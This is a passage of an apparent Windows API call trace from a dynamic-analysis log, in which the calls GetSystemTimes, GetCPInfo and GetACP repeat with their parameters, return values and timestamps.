lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.345] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.345] GetACP () returned 0x4e4 [0130.345] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.346] GetACP () returned 0x4e4 [0130.346] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.346] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.347] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.347] GetACP () returned 0x4e4 [0130.347] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.348] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.348] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.348] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.349] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.349] GetACP () returned 0x4e4 [0130.349] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.350] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.350] GetACP () returned 0x4e4 [0130.350] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.351] GetACP () returned 0x4e4 [0130.351] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.351] GetACP () returned 0x4e4 [0130.351] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.351] GetACP () returned 0x4e4 [0130.351] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.351] GetACP () returned 0x4e4 [0130.351] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.351] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.351] GetACP () returned 0x4e4 [0130.351] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.352] GetACP () returned 0x4e4 [0130.352] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.352] GetACP () returned 0x4e4 [0130.352] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.352] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.352] GetACP () returned 0x4e4 [0130.352] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.353] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.353] GetACP () returned 0x4e4 [0130.353] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.354] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.354] GetACP () returned 0x4e4 [0130.354] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.355] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.355] GetACP () returned 0x4e4 [0130.355] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.356] GetACP () returned 0x4e4 [0130.356] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.356] GetACP () returned 0x4e4 [0130.356] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.356] GetACP () returned 0x4e4 [0130.356] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.356] GetACP () returned 0x4e4 [0130.356] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.356] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.356] GetACP () returned 0x4e4 [0130.356] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: 